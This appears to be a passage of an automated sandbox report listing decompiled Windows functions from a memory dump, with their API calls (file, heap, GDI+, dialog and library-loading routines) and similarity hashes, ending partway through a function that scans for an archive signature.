Function 008399A7, Relevance: 3.1, APIs: 2, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008399A7(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				void* __ebp;
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				intOrPtr* _t22;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						_t22 = _t19;
						if(_t21 != 1) {
							_t17 = E00839779(_t22, _t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}

0x008399ab
0x008399b1
0x00839a16
0x00000000
0x00839a16
0x008399b4
0x008399b8
0x008399bb
0x008399bd
0x008399e7
0x008399c5
0x008399c5
0x008399ca
0x008399cf
0x008399d1
0x008399da
0x008399d3
0x008399d5
0x008399d5
0x008399df
0x008399e1
0x008399e3
0x008399e3
0x008399ca
0x008399ec
0x008399fb
0x00839a06
0x00000000
0x00839a12
0x00000000
0x00839a12

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 008399FB
GetLastError.KERNEL32 ref: 00839A08

Part of subcall function 00839779: __EH_prolog.LIBCMT ref: 0083977E

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileH_prologLastPointer
String ID:
API String ID: 4236474358-0
Opcode ID: 433240102f9c48289c913ddd40f18173ef469bc0cc6d53ad57e2f7c69ca62ccc
Instruction ID: a0803236d5a4b9e4f0bf43a813d19eb825d74e232bc90cf7e1e1b7886ebc51db
Opcode Fuzzy Hash: 433240102f9c48289c913ddd40f18173ef469bc0cc6d53ad57e2f7c69ca62ccc
Instruction Fuzzy Hash: 3F01F1326012149B8F189E2D8C84ABA3B59FFC1320B04422EECA6DB291D6F0DC11C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00857BEE, Relevance: 3.0, APIs: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00857BEE(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = HeapReAlloc( *0x890874, 0, _t14, _t16);
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E0085797C();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E008567A8(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00857F42())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00857AC6(_t14);
					goto L6;
				}
				_t9 = E00857B00(__ecx, _a8); // executed
				return _t9;
			}

0x00857bee
0x00857bee
0x00857bf4
0x00857bf9
0x00857c07
0x00857c0a
0x00857c0c
0x00857c17
0x00857c1a
0x00857c41
0x00857c4b
0x00857c51
0x00857c53
0x00000000
0x00000000
0x00857c32
0x00857c34
0x00000000
0x00000000
0x00857c37
0x00857c3c
0x00857c3d
0x00857c3f
0x00000000
0x00000000
0x00857c3f
0x00857c29
0x00000000
0x00857c29
0x00857c1c
0x00857c21
0x00857c27
0x00857c27
0x00857c27
0x00000000
0x00857c27
0x00857c0f
0x00000000
0x00857c14
0x00857bfe
0x00000000

APIs

_free.LIBCMT ref: 00857C0F

Part of subcall function 00857B00: RtlAllocateHeap.NTDLL(00000000,?,?,?,00853006,?,0000015D,?,?,?,?,008544E2,000000FF,00000000,?,?), ref: 00857B32

HeapReAlloc.KERNEL32(00000000,?,?,?,?,008700E0,0083CB6A,?,?,?,?,?,?), ref: 00857C4B

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 52573f66cff4bae107d0a33c78596a5fdb909b65ae3a0f6c88e45c0c202ea217
Instruction ID: e22270ad86ac8eb49ca4b7b8a4a76dd3389a50ca258dfa8521c79522bd1bad2a
Opcode Fuzzy Hash: 52573f66cff4bae107d0a33c78596a5fdb909b65ae3a0f6c88e45c0c202ea217
Instruction Fuzzy Hash: 21F062316081156E8B222A29BC01E6F2B58FF917B3B15C526FC54EA192EB20CC4995A2

Uniqueness

Uniqueness Score: -1.00%

Function 0084058E, Relevance: 3.0, APIs: 2, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0084058E(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}

0x008405a2
0x008405aa
0x00000000
0x008405ac
0x008405b1
0x008405b5
0x008405b8
0x008405ba
0x008405bc
0x008405be
0x008405be
0x008405bf
0x008405bf
0x008405c6
0x00000000
0x008405c8
0x008405cd

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 0084059B
GetProcessAffinityMask.KERNEL32(00000000), ref: 008405A2

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 316408df0f1be98a25e3c9470c3427cf1295be0871004984482bb3b616154822
Instruction ID: f267446726376f5323b52d277a9850fcabed634f86602e89abb241254d4057b5
Opcode Fuzzy Hash: 316408df0f1be98a25e3c9470c3427cf1295be0871004984482bb3b616154822
Instruction Fuzzy Hash: B9E09232A0560DAB4F188AB49C048BB77AEFA1431572241B9EA06E3200F934ED014FA1

Uniqueness

Uniqueness Score: -1.00%

Function 0083A1D3, Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0083A1D3(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0084D9C0();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}

0x0083a1db
0x0083a1e0
0x0083a1e7
0x0083a1ef
0x0083a1f4
0x0083a220
0x0083a220
0x0083a229

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A1E7
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A009,?,?,?,00839EA2,?,00000001,00000000,?,?), ref: 0083A218

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 054e2b4cfa27b06ec8884bb856372f97cefc9fd007cfa05e36bfac51920c7daf
Instruction ID: 59e0eb479f93e0e0af2be3fb2f4088b78dcbbda3d3dc6f4c834e633b748ad354
Opcode Fuzzy Hash: 054e2b4cfa27b06ec8884bb856372f97cefc9fd007cfa05e36bfac51920c7daf
Instruction Fuzzy Hash: 84F0303155021D6BDF025F64EC41FEA7BACFF08781F448051BD88D6160DB729E99EA91

Uniqueness

Uniqueness Score: -1.00%

Function 0084CBAD, Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0084CBDB
SetDlgItemTextW.USER32(00000065,?), ref: 0084CBF2

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: 9db4a47dbe7e78e2ba4971801cdb49f3115947e44123a7a18e9d9b03b19d1398
Instruction ID: dfd4378953fd0a42f64c5eaf03f0b89d1d734bdddd71697ffa39d5e219936067
Opcode Fuzzy Hash: 9db4a47dbe7e78e2ba4971801cdb49f3115947e44123a7a18e9d9b03b19d1398
Instruction Fuzzy Hash: 7FF0EC7290434C3AE711AB649C07F993B5CF705741F044595F605D60A1D5726A618BA3

Uniqueness

Uniqueness Score: -1.00%

Function 00839EBC, Relevance: 3.0, APIs: 2, Instructions: 28
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00839EBC(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0084D9C0();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}

0x00839ec4
0x00839ec9
0x00839ecd
0x00839ed5
0x00839eda
0x00839f03
0x00839f03
0x00839f0c

APIs

DeleteFileW.KERNELBASE(?,?,?,008396E0,?,?,0083953B), ref: 00839ECD
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,008396E0,?,?,0083953B), ref: 00839EFB

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: eed2ac1233121d35fbaa4563e7bb25fdd63e57273b53443de482a8ad6619c76b
Instruction ID: 9d94c18f4ef8ea772f0e74477bb8e234a2a04d0d9a6c12cdbe6b7752e91acf95
Opcode Fuzzy Hash: eed2ac1233121d35fbaa4563e7bb25fdd63e57273b53443de482a8ad6619c76b
Instruction Fuzzy Hash: 75E022306412096BDB01AF64DC01FE9779CFF083C1F4801A2F888C2150DFA18C94EAE1

Uniqueness

Uniqueness Score: -1.00%

Function 00839F23, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00839F23(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0084D9C0();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E0083B3C9(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}

0x00839f2b
0x00839f34
0x00839f3a
0x00839f3f
0x00839f60
0x00839f66
0x00839f66
0x00839f6e

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00839F18,?,008375EA,?,?,?,?), ref: 00839F34
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00839F18,?,008375EA,?,?,?,?), ref: 00839F60

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 9396b4e33ccf611e0592b34ad08beca909a646d89b20e8db9dba1cb5637d50d5
Instruction ID: 0d99ed99a1f6b63eb8d3c627891cd5952f25ce561b8ce861c8bc05e7f6eb3e98
Opcode Fuzzy Hash: 9396b4e33ccf611e0592b34ad08beca909a646d89b20e8db9dba1cb5637d50d5
Instruction Fuzzy Hash: 4DE09B3150022857CB11AB6CDC04BD5BB9CFB083E1F0142A1FD84E32D0DBB05D45C6D1

Uniqueness

Uniqueness Score: -1.00%

Function 0083FD16, Relevance: 3.0, APIs: 2, Instructions: 25
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0083FD16(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0084D9C0();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E0083B6C2( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}

0x0083fd1e
0x0083fd31
0x0083fd39
0x0083fd47
0x0083fd53
0x0083fd53
0x0083fd5d

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0083FD31
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083E82C,Crypt32.dll,?,0083E8AE,?,0083E892,?,?,?,?), ref: 0083FD53

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 8d173187ac228c5e5a6a6053b22ff6764c023e3623d0ec26362b8e30ab37a0e1
Instruction ID: 72c2b2292ce66767077be245813c648025f380196c79bb8b27c02bb38fe6eea3
Opcode Fuzzy Hash: 8d173187ac228c5e5a6a6053b22ff6764c023e3623d0ec26362b8e30ab37a0e1
Instruction Fuzzy Hash: 40E0127690111C6ADB119AA49C09FDA77ACFF08381F4400E5BA49D2015DAB49940CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00849401, Relevance: 3.0, APIs: 2, Instructions: 24
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00849401(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x863398;
				if(_a8 == 0) {
					L0084D862(); // executed
				} else {
					L0084D868();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}

0x00849404
0x00849406
0x00849408
0x0084940b
0x0084940e
0x00849416
0x00849417
0x0084941a
0x00849420
0x00849429
0x00849422
0x00849422
0x00849422
0x0084942e
0x00849434
0x0084943d

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00849422
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00849429

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 90c95f9765bb619376b9f4ce4806c445b398768ee03598fdba824c55deae279d
Instruction ID: be3ebc4915ec6c11429f42222a8ea4bedb7c0e6ca4bdf38f6fcb9f7ece550cc5
Opcode Fuzzy Hash: 90c95f9765bb619376b9f4ce4806c445b398768ee03598fdba824c55deae279d
Instruction Fuzzy Hash: B9E06D7180030CEBCB20DF99C5047AAB7F8FB04360F10846AE898D3700E6706E049B92

Uniqueness

Uniqueness Score: -1.00%

Function 00849B7B, Relevance: 3.0, APIs: 2, Instructions: 22
comCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00849B7B(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0x8775c0; // 0x74f5c100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E0086146D, 0xffffffff);
				L0084D87A(); // executed
				_t7 =  *0x86dff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}

0x00849b8c
0x00849b93
0x00849b9e
0x00849ba4
0x00849ba9
0x00849bb2
0x00849bbd

APIs

GdiplusShutdown.GDIPLUS(?,?,?,0086146D,000000FF), ref: 00849BA4
OleUninitialize.OLE32(?,?,?,0086146D,000000FF), ref: 00849BA9

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 90d34218e2d6b32b634702e74abeb6d5ad478caef002bb4462eb93c6b0b747a1
Instruction ID: 34439bdea5e2c6aadffab3f8a1405332b744d1a6bfb830bb78b5100ac772dbcb
Opcode Fuzzy Hash: 90d34218e2d6b32b634702e74abeb6d5ad478caef002bb4462eb93c6b0b747a1
Instruction Fuzzy Hash: DBE01A766486449FC710DB48DC05F55B7A8FB08B20F044769F81AC3B54CB74A800CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00851726, Relevance: 3.0, APIs: 2, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00851726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00852877(__eflags, E0085166A); // executed
				 *0x86d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00852925(__eflags, _t1, 0x8901dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00851759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x0085172b
0x00851730
0x00851739
0x00851744
0x0085174a
0x0085174b
0x0085174d
0x00851758
0x0085174f
0x0085174f
0x00000000
0x0085174f
0x0085173b
0x0085173b
0x0085173d
0x0085173d

APIs

Part of subcall function 00852877: try_get_function.LIBVCRUNTIME ref: 0085288C

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00851744
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0085174F

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 82cdaef1635c4c7aaace799d8583b2df87e9b1a846daa300b9b709b314ec578d
Instruction ID: 4d1e5da7088bb834ec83a99ed204c880b0b08cb475c057cd6735676197283bd2
Opcode Fuzzy Hash: 82cdaef1635c4c7aaace799d8583b2df87e9b1a846daa300b9b709b314ec578d
Instruction Fuzzy Hash: 20D02324A04701080E04377C680AF552754F527777BF15745FC30C95C5FE24800DB417

Uniqueness

Uniqueness Score: -1.00%

Function 008312B2, Relevance: 3.0, APIs: 2, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E008312B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}

0x008312b9
0x008312ce
0x008312d4

APIs

GetDlgItem.USER32(?,?), ref: 008312C7
ShowWindow.USER32(00000000), ref: 008312CE

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: dbaf1cd073b0689f72e2a4454db75c2702e484f80ceff640a807be80e4d3c8ad
Instruction ID: 2a18b8faad2c2eb9840b01711487770b6962020fa40cb14d84c29863bd1fe935
Opcode Fuzzy Hash: dbaf1cd073b0689f72e2a4454db75c2702e484f80ceff640a807be80e4d3c8ad
Instruction Fuzzy Hash: 1BC01272A58200BECB011BB0EC09D2EBBA8BBA4212F06C908F0A6C20A0CA78C010DB11

Uniqueness

Uniqueness Score: -1.00%

Function 008319C1, Relevance: 1.8, APIs: 1, Instructions: 275
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E008319C1(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t125;
				intOrPtr _t126;
				char _t133;
				intOrPtr _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				signed int _t147;
				intOrPtr _t148;
				signed int _t150;
				void* _t154;
				void* _t155;
				char _t159;
				signed int _t168;
				void* _t169;
				signed int _t171;
				char* _t183;
				intOrPtr _t184;
				intOrPtr _t190;
				intOrPtr* _t192;
				signed int _t196;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t200;
				void* _t201;

				_t190 = __edx;
				E0084D8C4(E008611DD, __ecx);
				_t192 = __ecx;
				_t159 = 0;
				_push(7);
				_t195 = __ecx + 0x21f8;
				_push(__ecx + 0x21f8);
				 *((char*)(__ecx + 0x6cbc)) = 0;
				 *((char*)(__ecx + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *__ecx + 0xc))() == 7) {
					 *((intOrPtr*)(__ecx + 0x6cc0)) = 0;
					_t106 = E00831D59(_t195, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E0083134C(_t201 - 0x30, 0x200000);
						 *(_t201 - 4) = 0;
						_t109 =  *((intOrPtr*)( *_t192 + 0x14))();
						_t190 =  *_t192;
						 *((intOrPtr*)(_t201 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t190 + 0xc))( *((intOrPtr*)(_t201 - 0x30)),  *((intOrPtr*)(_t201 - 0x2c)) + 0xfffffff0);
						_t168 = _t110;
						_t196 = 0;
						 *(_t201 - 0x14) = _t168;
						__eflags = _t168;
						if(_t168 <= 0) {
							L22:
							_t169 = _t201 - 0x30;
							__eflags =  *((intOrPtr*)(_t192 + 0x6cc0)) - _t159;
							if( *((intOrPtr*)(_t192 + 0x6cc0)) != _t159) {
								_t35 = _t201 - 4; // executed
								 *_t35 =  *(_t201 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E0083158D(_t169); // executed
								goto L25;
							}
							E0083158D(_t169);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t183 =  *((intOrPtr*)(_t201 - 0x30)) + _t196;
							__eflags =  *_t183 - 0x52;
							if( *_t183 != 0x52) {
								goto L17;
							}
							_t147 = E00831D59(_t183, _t110 - _t196);
							__eflags = _t147;
							if(_t147 == 0) {
								L16:
								_t110 =  *(_t201 - 0x14);
								goto L17;
							}
							_t184 =  *((intOrPtr*)(_t201 - 0x18));
							 *(_t192 + 0x6cb0) = _t147;
							__eflags = _t147 - 1;
							if(_t147 != 1) {
								L19:
								_t190 =  *_t192;
								_t148 = _t196 + _t184;
								 *((intOrPtr*)(_t192 + 0x6cc0)) = _t148;
								 *((intOrPtr*)(_t190 + 0x10))(_t148, _t159, _t159);
								_t150 =  *(_t192 + 0x6cb0);
								__eflags = _t150 - 2;
								if(_t150 == 2) {
									L21:
									 *((intOrPtr*)( *_t192 + 0xc))(_t192 + 0x21f8, 7);
									goto L22;
								}
								__eflags = _t150 - 3;
								if(_t150 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t196;
							if(_t196 <= 0) {
								goto L19;
							}
							__eflags = _t184 - 0x1c;
							if(_t184 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t201 - 0x14) - 0x1f;
							if( *(_t201 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t154 =  *((intOrPtr*)(_t201 - 0x30)) - _t184;
							__eflags =  *((char*)(_t154 + 0x1c)) - 0x52;
